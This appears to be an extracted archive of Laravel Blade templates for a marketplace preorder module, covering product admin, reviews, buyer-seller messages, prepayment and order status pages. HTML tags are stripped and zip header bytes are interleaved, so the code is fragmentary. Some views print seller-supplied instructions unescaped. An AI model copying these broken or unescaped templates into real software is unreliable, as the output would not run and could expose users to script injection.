    show_shipping_time == 1 ? 'checked' : ''}}>
    show_shipping_note == 1 ? 'checked' : ''}}>
    @if($shipping?->note != null)
    {{ $shipping->note->getTranslation('description') ?? '' }}
    @endif
    {{translate('Cash On Delivery')}}
    prepayment_needed == 1 ? 'checked' : '' }}>
    show_cod_note == 1 ? 'checked' : '' }}>
    @if($cod?->note != null)
    {{ $cod->note->getTranslation('description') ?? '' }}
    @endif
    @if (addon_is_activated('gst_system'))
    {{translate('HSN & GST')}}
    {{translate('Harmonized System Nomenclature (HSN) code for tax purposes. [e.g. "8517"]')}}
    {{translate('Goods and Services Tax (GST) rate percentage for this product. [e.g. "18%"]')}}
    @else
    {{translate('VAT & Tax')}}
    @foreach($taxes as $tax) @php @endphp
    {{translate('Enter the vat & tax rate percentage for this product. [e.g. "8%"]')}}
    @endforeach
    @endif
    {{translate('More Products to Preorder')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    @php $more_product_ids = json_decode($product->more_products, true); if (is_array($more_product_ids) && !empty($more_product_ids)) { $more_products = \App\Models\PreorderProduct::whereIn('id', $more_product_ids)->get(); } else { $more_products = collect(); } @endphp @if(count($more_products) > 0)
    @foreach($more_products as $more_product) @endforeach
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{ translate('Options') }}

    {{ translate('Image')}}

    {{ $more_product->getTranslation('product_name') }}

    {{ $more_product->main_category->name ?? translate('Category Not Found') }}
    @endif
    {{translate('Frequently Bought Products')}}

    {{translate('This is a customised section in product description page where you can select end category or selected products as More Products to Preorder.')}}

    frequently_bought_type == 'product') checked @endif >
    frequently_bought_type == 'category') checked @endif >
    @php $frequently_bought_product_ids = json_decode($product->frequently_bought_product, true); if (is_array($frequently_bought_product_ids) && !empty($frequently_bought_product_ids)) { $fq_bought_products = \App\Models\Product::whereIn('id', $frequently_bought_product_ids)->get(); } else { $fq_bought_products = collect(); // Empty collection if no valid IDs } @endphp @if(count($fq_bought_products) > 0)
    @foreach($fq_bought_products as $fQBproduct) @endforeach
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{translate('Options') }}

    {{ translate('Image')}}

    {{ $fQBproduct->getTranslation('name') }}

    {{ $fQBproduct->main_category->name ?? translate('Category Not Found') }}
    @endif
    {{-- Select Category for Frequently Bought Product --}}
    @php $fqCategory = $product->frequently_bought_category != null ? $product->frequently_bought_category : null; @endphp
    @endsection @section('modal') @include('modals.product_select_modal') {{-- Pre Order Product Select Model --}} @include('preorder.common.models.pre_order_product_select_modal') {{-- Note Modal --}} @include('modals.note_modal') @endsection @section('script') @endsectionPK�N]�*?��c�c/views/preorder/backend/products/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @php CoreComponentRepository::instantiateShopRepository(); CoreComponentRepository::initializeCache(); @endphp

    {{ translate('All Preorder Products') }}

    @can('add_preorder_product') @endcan

    {{ translate('All Preorder Products') }}
    @php $activeClasss = 'p-3 m-2 text-white rounded-3 fs-12 bg-soft-dark'; $inActiveClasses = 'bg-white p-3 m-2 rounded-3 text-muted fs-12 fw-600'; @endphp {{ translate('All') }} {{ translate('In-house') }}({{ $inHouseProductCount }}) {{ translate('Seller’s') }}({{ $sellerProductCount }})
    {{ translate('Published') }}({{ $publishedProductCount }}) {{ translate('Unpublished') }}({{ $unpublishedProductCount }}) {{ translate('Discounted') }}({{ $discountedProductCount }})
    @can('delete_preorder_product') @endcan
    @if (auth()->user()->can('product_delete')) @else @endif @if($type == 'seller' && get_setting('product_approve_by_admin')) @endif @foreach ($products as $key => $product) @if (auth()->user()->can('product_delete')) @else @endif @if($type == 'seller' && get_setting('product_approve_by_admin')) @endif @endforeach
    #{{ translate('Image') }} {{ translate('Product details') }} {{ translate('Product details') }} {{ translate('Price') }} {{ translate('Discount') }} {{ translate('Availability') }} {{ translate('Orders') }} {{ translate('Status') }}{{ translate('Approval') }}{{ translate('Actions') }}
    {{ $key + 1 + ($products->currentPage() - 1) * $products->perPage() }}
    Image
    {{ Str::limit($product?->getTranslation('product_name'), 50, ' ...') }}
    {{ translate('Category') }} {{ $product->category?->name }}
    {{ translate( $product->user->user_type != 'seller' ? 'In-house' : $product->user->shop->name) }} {{ translate('Product Created :') . $product->created_at->format('d.m.Y') }}
    {{ translate('Min Purchase Qty') }} {{ $product->min_qty . ' ' . $product->unit }}
    {{ translate('Refund') }} {{ $product->is_refundable ? 'Refundable' : 'Not Refundable' }}
    {{ translate('Price') }} {{ $product->unit_price . ' / ' . $product->unit }} {{ translate('Fixed') }}
    @if($product->is_prepayment)
    {{ translate('Prepayment') }} {{ $product->preorder_prepayment?->prepayment_amount }} {{ translate('Needed') }}
    @endif
    @if($product->discount > 0)
    -{{ $product->discount_type == 'flat' ? single_price($product->discount) : $product->discount.'%' }}
    @endif
    @if($product->is_available || $product->available_date != null)
    @if($product->is_available) {{ translate('Available now') }} @elseif($product->available_date != null) {{ $product->available_date }} {{strtotime($product->available_date) > strtotime(date('d-m-Y')) ? translate('Approx') : translate('Available now') }} @endif
    @endif
    {{ translate('PreOrder') }} @if($product->is_prepayment) {{ $product->preorder->where('request_preorder_status',2)->whereIn('prepayment_confirm_status',[0,1])->count() }} @else {{ $product->preorder->where('request_preorder_status',2)->whereIn('final_order_status',[0, 1])->count() }} @endif
    {{ translate('Final Order') }} {{ $product->preorder->where('final_order_status', 2)->count() }}
    {{ translate('Publish') }}
    {{ translate('Featured') }}
    @can('edit_preorder_product') @endcan @can('delete_preorder_product') @if($product->preorder->count() == 0) @endif @endcan
    {{ $products->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') @endsection @section('script') @endsection PK�N]�>�� � 4views/preorder/backend/product_query/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Product Queries') }}
    @foreach ($queries as $key => $query) @endforeach
    # {{ translate('User Name') }} {{ translate('Product Name') }} {{ translate('Question') }} {{ translate('Reply') }} {{ translate('status') }} {{ translate('Options') }}
    {{ translate($key + 1) }} {{ $query->user->name ?? translate('Customer Not Found') }} {{ $query->preorderProduct != null ? $query->preorderProduct->getTranslation('product_name') : translate('Product Not Found') }} {{ Str::limit($query->question, 100) }} {{ Str::limit($query->reply, 100) }} {{ $query->reply == null ? translate('Not Replied') : translate('Replied')}}
    {{ $queries->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]qg�$� � 3views/preorder/backend/product_query/show.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ $query->product != null ? $query->product->getTranslation('name') : translate('Product Not Found') }}
    • user != null) src="{{ uploaded_asset($query->user->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';">
      @if ($query->user != null) {{ $query->user->name }} @endif

      {{ $query->created_at->diffForHumans() }}

      {{ strip_tags($query->question) }}

    @if ((auth()->user()->id == $query->seller_id || auth()->user()->user_type == 'staff') && auth()->user()->can('reply_preorder_product_queries'))
    @method('put') @csrf

    @endif
    @endsection PK�N]v`���?views/preorder/backend/product_reviews/detail_reviews.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Detail Reviews')}}


    Image
    {{ $product->getTranslation('product_name') }}

    {{ strtoupper(translate('Rating')) }}

    {{ $product->rating }}

    @for ($i=0; $i < $product->rating; $i++) @endfor @for ($i=0; $i < 5-$product->rating; $i++) @endfor


    @foreach($reviews as $key => $review) @endforeach
    # {{ strtoupper(translate('Customer')) }} {{ strtoupper(translate('Rating')) }} {{ strtoupper(translate('Comment')) }} {{ strtoupper(translate('Published')) }}
    {{ ($key+1) + ($reviews->currentPage() - 1)*$reviews->perPage() }} @php $customerName = null; $customerAvatar = null; if($review->type == "real"){ if($review->user != null){ $customerName = $review->user->name; $customerAvatar = uploaded_asset($review->user->avatar_original); } else { $customerName = translate('Customer Not Found'); } } else{ $customerName = $review->custom_reviewer_name; $customerAvatar = uploaded_asset($review->custom_reviewer_image); } @endphp
    Image
    {{ $customerName }}
    {{ $review->rating }} {{ $review->comment }} @if($review->photos != null)
    @foreach (explode(',', $review->photos) as $photo) @endforeach
    @endif
    {{ date("j F, Y", strtotime($review->created_at)) }}
    {{ $reviews->appends(request()->input())->links() }}
    @endsection @section('script') @endsection PK�N]�OV��6views/preorder/backend/product_reviews/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All Rating & Reviews')}}


    {{ translate('Product Review & Ratings') }}
    @foreach($products as $key => $product) @endforeach
    # {{translate('Product Name')}} {{translate('Product Owner')}} {{translate('Rating')}} {{translate('Reviews')}} {{translate('Options')}}
    {{ ($key+1) + ($products->currentPage() - 1)*$products->perPage() }}
    Image
    {{ $product->getTranslation('product_name') }}
    {{ $product->user->name}} {{ $product->rating}} {{ $product->preorderProductreviews->count()}} @if($product->preorderProductreviews()->where('viewed',0)->count() > 0) {{ translate('new') }} @endif
    {{ $products->appends(request()->input())->links() }}
    @endsection @section('script') @endsection PK�N]�fH��%�%/views/preorder/backend/settings/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{-- seller Commission --}}
    {{ translate('Preorder Seller Commission') }}
    @csrf
    %
    {{ translate('PreOrder Settings') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{-- Preorder Request --}}
    {{ translate('Preorder Instructions') }}
    @csrf
    {{-- payment info --}}
    {{ translate('Payment Instructions') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @endsection @section('script') @endsectionPK�N]l��U  (views/preorder/common/messages.blade.phpnu�[���@php $authUserId = auth()->id(); @endphp @foreach ($conversation->messages as $key => $message) @if ($message->sender_id == $authUserId)
    @if ($authUserId != $message->sender_id && $message->sender->shop != null) @else sender != null) src="{{ uploaded_asset($message->sender->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @endif
    {{ $message->message }}
    {{ date('h:i:m d-m-Y', strtotime($message->created_at)) }}
    @else
    @if ($authUserId != $message->sender_id && $message->sender->shop != null) @else sender != null) src="{{ uploaded_asset($message->sender->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @endif
    {{ $message->message }}
    {{ date('h:i:m d-m-Y', strtotime($message->created_at)) }}
    @endif @endforeach PK�N]!�r��9views/preorder/common/models/preorder_cormation.blade.phpnu�[��� PK�N]����{{Eviews/preorder/common/models/pre_order_product_select_modal.blade.phpnu�[���PK�N]~'�^rrAviews/preorder/common/models/product_conversation_modal.blade.phpnu�[���
    @csrf
    PK�N]�&�2��;views/preorder/common/models/product_review_modal.blade.phpnu�[��� @if($review == null)
    @csrf
    @else
  • @for ($i=0; $i < $review->rating; $i++) @endfor @for ($i=0; $i < 5-$review->rating; $i++) @endfor

    {{ $review->comment }}

    @if($review->photos != null)
    @foreach (explode(',', $review->photos) as $photo)
    @endforeach
    @endif
  • @endif PK�N]^Թ�T T @views/preorder/common/models/seller_preorder_cormation.blade.phpnu�[��� {{-- --}} PK�N]���i+ + 3views/preorder/common/order/order_summary.blade.phpnu�[���
    {{ translate('Subtotal') }} ({{$order->unit_price}} x {{$order->quantity}}) {{ format_price($order->unit_price * $order->quantity) }}
    @if(!is_numeric($order->gst_amount))
    {{ translate('Vat & Tax') }} {{ format_price($order->tax) }}
    @endif
    {{ translate('Shipping Cost') }} {{ format_price($order->shipping_cost) }}
    {{ translate('Product Discount') }} {{ format_price($order->product_discount) }}
    @if($order->is_coupon_applied)
    {{ translate('Coupon Discount') }} {{ format_price($order->coupon_discount) }}
    @endif @if(is_numeric($order->gst_amount)) @if($order->address_id) @if(preorder_same_state_shipping($order))
    {{ translate('CGST') }} {{ format_price($order->gst_amount/2) }}
    {{ translate('SGST') }} {{ format_price($order->gst_amount/2) }}
    @else
    {{ translate('IGST') }} {{ format_price($order->gst_amount) }}
    @endif @else
    {{ translate('GST') }} {{ format_price($order->gst_amount) }}
    @endif @endif @if( $order->prepayment !== null )
    {{ translate('Prepayment') }} {{ format_price($order->prepayment) }}
    {{ translate($order->final_order_status !=2 ? 'Remaining' : 'Final Payment') }} {{ format_price($order->grand_total - $order->prepayment) }}
    @endif
    {{ translate('TOTAL') }} {{ format_price($order->grand_total) }}
    PK�N]?��QQ8views/preorder/common/pre_order_product_search.blade.phpnu�[���@if(count($products) > 0) @foreach ($products as $key => $product) @endforeach
    {{ $product->getTranslation('product_name') }}
    {{ single_price($product->unit_price) }}
    @endifPK�N]?����:views/preorder/common/pre_order_selected_product.blade.phpnu�[���
    @if(count($products) > 0) @foreach($products as $product) @endforeach @endif
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{ translate('Options') }}

    {{ translate('Image')}}

    {{ $product->getTranslation('product_name') }}

    {{ $product->main_category->name ?? translate('Category Not Found') }}
    PK�N]�ՙ��9�91views/preorder/frontend/all_preproducts.blade.phpnu�[���@extends('frontend.layouts.app') @if (isset($category_id)) @php $meta_title = $category->meta_title; $meta_description = $category->meta_description; @endphp @elseif (isset($brand_id)) @php $meta_title = get_single_brand($brand_id)->meta_title; $meta_description = get_single_brand($brand_id)->meta_description; @endphp @else @php $meta_title = get_setting('meta_title'); $meta_description = get_setting('meta_description'); @endphp @endif @section('meta_title'){{ $meta_title }}@stop @section('meta_description'){{ $meta_description }}@stop @section('meta') @endsection @section('content')

    @if(isset($category_id)) {{ $category->getTranslation('name') }} @elseif(isset($query)) {{ translate('Search result for ') }}"{{ $query }}" @else {{ translate('Preorder Products') }} @endif

    @foreach ($preorder_products as $key => $product)
    @include('preorder.frontend.product_box2',['product' => $product])
    @endforeach
    {{ $preorder_products->appends(request()->input())->links() }}
    @endsection @section('script') @endsection PK�N][�??2views/preorder/frontend/all_preproducts1.blade.phpnu�[���@extends('frontend.layouts.app') @section('content')

    {{ translate('All Preorder Products') }}

    @foreach ($products as $product)
    @include('preorder.frontend.product_box',['product' => $product])
    @endforeach
    {{ $products->links() }}
    @endsection PK�N]�ȮH��5views/preorder/frontend/conversations/index.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{ translate('Conversations')}}

    {{ translate('Select a conversation to view all messages')}}

    @if (count($conversations) > 0) @php $authUserId = auth()->id(); @endphp
      @foreach ($conversations as $key => $conversation)
    • @if ($authUserId == $conversation->sender_id) @if ($conversation->receiver->shop != null) @else receiver->avatar_original == null) src="{{ static_asset('assets/img/avatar-place.png') }}" @else src="{{ uploaded_asset($conversation->receiver->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @endif @else sender->avatar_original == null) src="{{ static_asset('assets/img/avatar-place.png') }}" @else src="{{ uploaded_asset($conversation->sender->avatar_original) }}" @endif class="rounded-circle" onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';"> @endif
      @if ($authUserId == $conversation->sender_id)
      @if ($conversation->receiver->shop != null) {{ $conversation->receiver->shop->name }} @else {{ $conversation->receiver->name }} @endif
      @else
      {{ $conversation->sender->name }}
      @endif {{ date('d.m.Y h:i:m', strtotime($conversation->messages->last()->created_at)) }}
      {{ $conversation->title }} @if ($conversation->messages()->where('sender_id', '!=' , $authUserId)->whereReceiverViewed(0)->count() > 0) {{ translate('New') }} @endif

      {{ $conversation->messages->last()->message }}

    • @endforeach
    @else
    Image
    {{ translate("There isn't anything added yet")}}
    @endif
    {{ $conversations->links() }}
    @endsection PK�N]�9ۗ--4views/preorder/frontend/conversations/show.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{ $conversation->title }}

    {{ translate('Conversations Between you and') }} @if(in_array($conversation->receiver->user_type, ['admin', 'staff'])) {{ get_setting('site_name') }} @else {{ $conversation->receiver->shop->name }} @endif

    @include('preorder.common.messages', ['conversation', $conversation])
    @csrf
    @endsection @section('script') @endsection PK�N]]�>�n n ;views/preorder/frontend/home_page/newest_preorder.blade.phpnu�[��� @php $newest_preorder_products = \App\Models\PreorderProduct::where('is_published', 1) ->where(function ($query) { $query->whereHas('user', function ($q) { $q->where('user_type', 'admin'); })->orWhereHas('user.shop', function ($q) { $q->where('verification_status', 1); }); }) ->latest() ->limit(12) ->get(); @endphp @if (count($newest_preorder_products) > 0)

    {{ translate('Newest Preorder Products') }}

    @php $newest_preorder_banner_image = get_setting('newest_preorder_banner_image', null, $lang); @endphp
    @endifPK�N]��F,T T Cviews/preorder/frontend/home_page/thecore/newest_preorder.blade.phpnu�[���@php $newest_preorder_products = \App\Models\PreorderProduct::where('is_published', 1) ->where(function ($query) { $query->whereHas('user', function ($q) { $q->where('user_type', 'admin'); })->orWhereHas('user.shop', function ($q) { $q->where('verification_status', 1); }); }) ->latest() ->limit(12) ->get(); @endphp @if (count($newest_preorder_products) > 0)

    {{ translate('Newest Preorder Products') }}

    View All
    @php $newest_preorder_banner_image = get_setting('newest_preorder_banner_image', null, $lang); @endphp
    @endifPK�N]z��$� � 1views/preorder/frontend/how_to_preorder.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta') @endsection @section('content')

    {{translate('HOW TO PREORDER ?')}}

    @foreach($faqs as $faq)
    {{$faq->question}}

    @endforeach
    @endsection @section('script') @endsectionPK�N]-views/preorder/frontend/order/index.blade.phpnu�[���PK�N]}�ض;;:views/preorder/frontend/order/left/delivery_info.blade.phpnu�[���@php $admin_products = array(); $seller_products = array(); $admin_product_variation = array(); $seller_product_variation = array(); $pickup_point_list = array(); if (get_setting('pickup_point') == 1) { $pickup_point_list = get_all_pickup_points(); } @endphp @if (!empty($admin_products))
    {{ get_setting('site_name') }} {{ translate('Inhouse Products') }} ({{ sprintf("%02d", count($admin_products)) }})
    @include('frontend.partials.cart.delivery_info_details', ['products' => $admin_products, 'product_variation' => $admin_product_variation, 'owner_id' => get_admin()->id ])
    @endif @if (!empty($seller_products)) @foreach ($seller_products as $key => $seller_product)
    {{ get_shop_by_user_id($key)->name }} {{ translate('Products') }} ({{ sprintf("%02d", count($seller_product)) }})
    @include('frontend.partials.cart.delivery_info_details', ['products' => $seller_product, 'product_variation' => $seller_product_variation, 'owner_id' => $key ])
    @endforeach @endifPK�N]�� |ll:views/preorder/frontend/order/left/shipping_info.blade.phpnu�[���@if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif @if(Auth::check()) @foreach (Auth::user()->addresses as $key => $address) @php $city = optional($address->city); $area_id = $address->area_id; $has_area_id = !is_null($area_id); $city_status = $city->status; $active_area_exists = $city->areas()->where('status', 1)->exists(); // new line $area_status = $has_area_id ? optional($address->area)->status : 1; $is_disabled = ($city_status === 0) || ($has_area_id && $area_status === 0) || ($active_area_exists && !$has_area_id) || ($address->state_id == null && get_setting('has_state') == 1); @endphp
    @if($is_disabled)
    {{ translate('We no longer deliver in this area.') }}
    @endif
    @endforeach
    {{ translate('Add New Address') }}
    @else @include('frontend.partials.cart.guest_shipping_info') @endifPK�N]�6$>views/preorder/frontend/order/partials/delivery_info.blade.phpnu�[���@php $pickup_point_list = array(); if (get_setting('pickup_point') == 1) { $pickup_point_list = get_all_pickup_points(); } @endphp
    {{ get_setting('site_name') }}
    @include('preorder.frontend.order.partials.delivery_info_details', ['product' => $order->preorder_product, 'order' => $order, 'pickup_point_list' => $pickup_point_list, 'owner_id' => get_admin()->id ])
    PK�N]{|Fviews/preorder/frontend/order/partials/delivery_info_details.blade.phpnu�[���
    • {{  $product?->getTranslation('name')  }} {{ $product?->product_name }}
    {{ translate('Choose Delivery Type') }}
    @if (get_setting('shipping_type') != 'carrier_wise_shipping')
    @else
    @endif @if ($pickup_point_list)
    @endif
    @if ($pickup_point_list)
    @endif @if (get_setting('shipping_type') == 'carrier_wise_shipping')
    @foreach($carrier_list as $carrier_key => $carrier)
    @endforeach
    @endif
    PK�N]͇`~�$�$:views/preorder/frontend/order/product_order_page.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta') @endsection @section('content')
    @include('preorder.frontend.product_details.image_gallery') @include('preorder.frontend.product_details.description') @include('preorder.frontend.product_details.preorder_products') @include('preorder.frontend.product_details.lead_time') @include('preorder.frontend.product_details.customization') @include('preorder.frontend.product_details.sample') @include('preorder.frontend.product_details.review_section') @include('preorder.frontend.product_details.frequently_bought_products') @include('preorder.frontend.product_details.seller_info') @include('preorder.frontend.product_details.product_queries') @include('preorder.frontend.product_details.related_products') @include('preorder.frontend.product_details.top_selling')
    @include('preorder.frontend.product_details.details') @include('preorder.frontend.product_details.right.price_section') @include('preorder.frontend.product_details.right.review') @include('preorder.frontend.product_details.right.coupon') @include('preorder.frontend.product_details.right.brand') @include('preorder.frontend.product_details.right.shop') @include('preorder.frontend.product_details.right.shipping') @if($product->is_refundable) @include('preorder.frontend.product_details.right.refund') @endif @include('preorder.frontend.product_details.right.icon_section') @include('preorder.frontend.product_details.right.faq')
    @endsection @section('modal') @if($product->auction_product == 1) @php $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid+1 : $product->starting_bid; @endphp @endif @include('modals.size_chart_show_modal') @endsection @section('script') @endsectionPK�N]~��G8views/preorder/frontend/order/purchase_history.blade.phpnu�[���@extends('frontend.layouts.user_panel') @section('panel_content')
    {{ translate('Preorder List') }}
    @foreach ($orders as $key => $order) @endforeach
    {{ translate('Order Code')}} {{ translate('Date')}} {{ translate('Amount')}} {{ translate('Status')}} {{ translate('Options')}}
    Image
    {{ \Carbon\Carbon::parse($order->created_at)->format('j F, Y') }} {{ single_price($order->grand_total) }} @if($order->refund_status == 2) {{ translate('Refunded')}} @elseif($order->delivery_status == 2) {{ translate('Delivered')}} @elseif($order->shipping_status == 2) {{ translate('In Shipping')}} @elseif($order->final_order_status == 1) {{ translate('Final Order Requested')}} @elseif($order->final_order_status == 2) {{ translate('Final Order Accepted')}} @elseif($order->final_order_status == 3) {{ translate('Final Order Cancelled')}} @elseif($order->prepayment_confirm_status == 1) {{ translate('Prepayment Requested')}} @elseif($order->prepayment_confirm_status == 2) {{ translate('Prepayment Accepted')}} @elseif($order->prepayment_confirm_status == 3) {{ translate('Prepayment Cancelled')}} @elseif($order->request_preorder_status == 1) {{ translate('Preorder Requested')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Accepted')}} @elseif($order->request_preorder_status == 2) {{ translate('Preorder Request Cancelled')}} @endif
    {{ $orders->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]Rew)��;views/preorder/frontend/order/right/order_summary.blade.phpnu�[���

    {{ translate('Order Summary') }}

    @include('preorder.common.order.order_summary')
    PK�N]Zl�rr=views/preorder/frontend/order/right/payment_summary.blade.phpnu�[���

    {{translate('Payment Summary')}}

    @if($order->preorder_product?->is_prepayment)

    {{ translate('Total Amount') }}

    {{ format_price($order->grand_total) }}

    {{ translate('Prepay Amount') }}

    {{ format_price($order->prepayment) }}

    @else

    {{ translate('Total Amount') }}

    {{ format_price($order->grand_total) }}

    {{ translate('Prepay Amount') }}

    {{ format_price(0) }}

    @endif

    *{{ translate('Amount to be paid while final order ')}} {{format_price($order->preorder_product?->is_prepayment ? ($order->grand_total - $order->prepayment) : $order->grand_total) }}

    {{--

    *{{ translate('Minimum order quantity')}} {{ $order->quantity }}

    --}}
    @if($order->final_order_status == 0 && $order->preorder_product?->is_coupon)
    @php $is_coupon_applied = $order->is_coupon_applied;@endphp
    @csrf @method('POST')
    @endif
    PK�N]s��gg=views/preorder/frontend/order/right/preorder_status.blade.phpnu�[���

    {{translate('Preorder Status')}}

    {{translate('Requested Pre order')}} {{ $order->request_preorder_time != null ? \Carbon\Carbon::parse($order->request_preorder_time)->format('H:i \h\r\s, j F, Y') : '' }}
    {{translate('Pre order request accepted')}} {{ $order->request_preorder_time != null ? \Carbon\Carbon::parse($order->request_preorder_time)->format('H:i \h\r\s, j F, Y') : '' }}
    @if($order->preorder_product?->is_prepayment)
    {{translate('Prepayment confirmation')}} {{ $order->prepayment_confirmation_time != null ? \Carbon\Carbon::parse($order->prepayment_confirmation_time)->format('H:i \h\r\s, j F, Y') : '' }}
    @endif
    {{translate('Order confirmed')}} {{ $order->prepayment_confirmation_time != null ? \Carbon\Carbon::parse($order->prepayment_confirmation_time)->format('H:i \h\r\s, j F, Y') : '' }}
    {{translate('Product is live')}}
    {{translate('Final order ')}} {{$order->final_order_time != null ? \Carbon\Carbon::parse($order->final_order_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Product In Shipping')}} {{$order->shipping_time != null ? \Carbon\Carbon::parse($order->shipping_time)->format('H:i \h\r\s, j F, Y') : ''}}
    {{translate('Product Delivered')}} {{$order->delivery_time != null ? \Carbon\Carbon::parse($order->delivery_time)->format('H:i \h\r\s, j F, Y') : ''}}
    PK�N]u*â�,views/preorder/frontend/order/show.blade.phpnu�[���@extends('frontend.layouts.app') @section('meta') @endsection @section('content') @php $seller = $order->preorder_product->user->shop; $instruction_qr_code = $order->preorder_product->user->user_type == 'admin' ? get_setting('image_for_payment_qrcode') : $seller?->image_for_payment_qrcode; @endphp

    {{$order->preorder_product?->product_name}}

    {{translate('Order Code : '. $order->order_code)}} {{$order->preorder_product?->is_available ? translate( 'Available Now ') : (strtotime($order->preorder_product?->available_date) <= strtotime(date('Y-m-d')) ? translate( 'Available Now ') : translate('Available on ') .' '. $order->preorder_product?->available_date .' '. (translate(' estimated')))}} @if($order->preorder_product?->discount != null && $order->preorder_product?->discount > 0 && $order->preorder_product?->discount_start_date != null && (strtotime(date('d-m-Y')) > $order->preorder_product->discount_start_date || strtotime(date('d-m-Y')) < $order->preorder_product->discount_end_date)) {{ translate('Discount ')}} {{ $order->preorder_product?->discount_type == 'flat' ? single_price($order->preorder_product?->discount) : $order->preorder_product?->discount.'%'}} @endif @if($order->preorder_product?->is_prepayment) {{ translate('Prepayment Needed') }} @endif
    {{-- accordion --}}
    {{ translate('Request Preorder') }}
    @csrf @method('PUT')
    @if($order->preorder_product?->is_cod)

    {{translate('Cash ondelivery available')}}

    @endif @if($order->preorder_product->user->user_type == 'admin')

    {!! get_setting('preorder_request_instruction') !!}

    @else

    {!! $seller?->preorder_request_instruction !!}

    @endif
    @if($order->request_note != null)

    {{ $order->request_note }}

    @endif
    @if($order->request_preorder_status == 2)
    @elseif($order->request_preorder_status == 3)
    @elseif($order->request_preorder_status == 1)
    @else
    @endif
    @if($order->preorder_product?->is_prepayment)
    {{ translate('Pre-payment & Confirmation') }}
    @csrf @method('PUT')
    @if($order->preorder_product->user->user_type == 'admin')

    {!! get_setting('pre_payment_instruction') !!}

    @else

    {!! $seller?->pre_payment_instruction !!}

    @endif
    @if($instruction_qr_code)
    @endif
    @if($order->prepayment_confirm_status == 0)
    @if($order->prepayment_confirm_status == 0)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endif
    prepayment_confirm_status !== 0) readonly @endif>
    @endif @if($order->prepayment_confirm_status !== 0)

    {{translate('Proof of payment')}}

    {{translate('Reference No.')}}

    {{$order->reference_no}}

    @endif
    @if($order->prepayment_confirm_status == 0)
    @endif @if($order->confirm_note != null)

    {{ $order->confirm_note }}

    @endif
    @if($order->prepayment_note)

    {{ $order->prepayment_note }}

    @endif @if($order->prepayment_confirm_status == 0 && $order->request_preorder_status == 2) @endif
    {{-- button --}} @if($order->request_preorder_status == 2) @if($order->prepayment_confirm_status == 2)
    @elseif($order->prepayment_confirm_status == 3)
    @elseif($order->prepayment_confirm_status == 1)
    @else
    @endif @endif {{-- --}}
    @endif
    {{ translate('Final Payment & Order Completion') }}
    @csrf @method('PUT') {{-- Nested Accordion --}}
    {{-- Address --}}
    {{ translate('Address') }}
    @include('preorder.frontend.order.left.shipping_info', ['address_id' => 5, 'order'=> $order])
    {{ translate('Delivery Info') }}
    @include('preorder.frontend.order.partials.delivery_info', ['carrier_list' => $carrier_list, 'shipping_info' => $shipping_info, 'order'=> $order])
    {{ translate('Payment Info') }}
    @if($order->preorder_product->user->user_type == 'admin')

    {!! get_setting('pre_payment_instruction') !!}

    @else

    {!! $seller?->pre_payment_instruction !!}

    @endif
    @if($instruction_qr_code)
    @endif
    @if($order->final_order_status == 0 && $order->preorder_product?->is_cod)
    @endif @if($order->final_order_status == 0)
    @if($order->final_order_status == 0)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endif
    final_order_status !== 0) readonly @endif>
    @endif @if($order->final_order_status !== 0)
    @if($order->cod_for_final_order)

    {{translate('Payment Type')}}

    @else

    {{translate('Proof of payment')}}

    {{translate('Reference No.')}}

    @endif
    @if($order->cod_for_final_order)

    {{translate('Cash on delivery')}}

    @else

    {{$order->final_payment_reference_no}}

    @endif
    @endif
    @if($order->final_order_status == 0)
    @endif @if($order->final_payment_confirm_note != null)

    {{ $order->final_payment_confirm_note }}

    @endif
    @if($order->final_oder_note)

    {{ $order->final_oder_note }}

    @endif
    @php $condition = $order->preorder_product?->is_prepayment ? $order->prepayment_confirm_status == 2 : $order->request_preorder_status == 2; @endphp @if($condition) @if($order->final_order_status == 2)
    @elseif($order->final_order_status == 3)
    @elseif($order->final_order_status == 1)
    @else
    @endif @endif
    @if($order->shipping_status ==2)
    {{ translate('Shipment Details') }}

    {{translate('Proof of shipping')}}

    {{translate('Notes')}}

    {{$order->shipping_note}}

    @endif @if($order->delivery_status ==2)
    {{ translate('Delivery Notes') }}

    {{translate('Notes')}}

    {{$order->delivery_note}}

    @endif @if($order->preorder_product?->is_refundable && $order->delivery_status==2)
    {{ translate('Refund Request') }}
    @if($order->refund_status == 2) {{ translate('Accepted')}} @elseif($order->refund_status == 3) {{ translate('Rejected')}} @endif
    @csrf @method('PUT')
    @if($order->refund_status == 0)
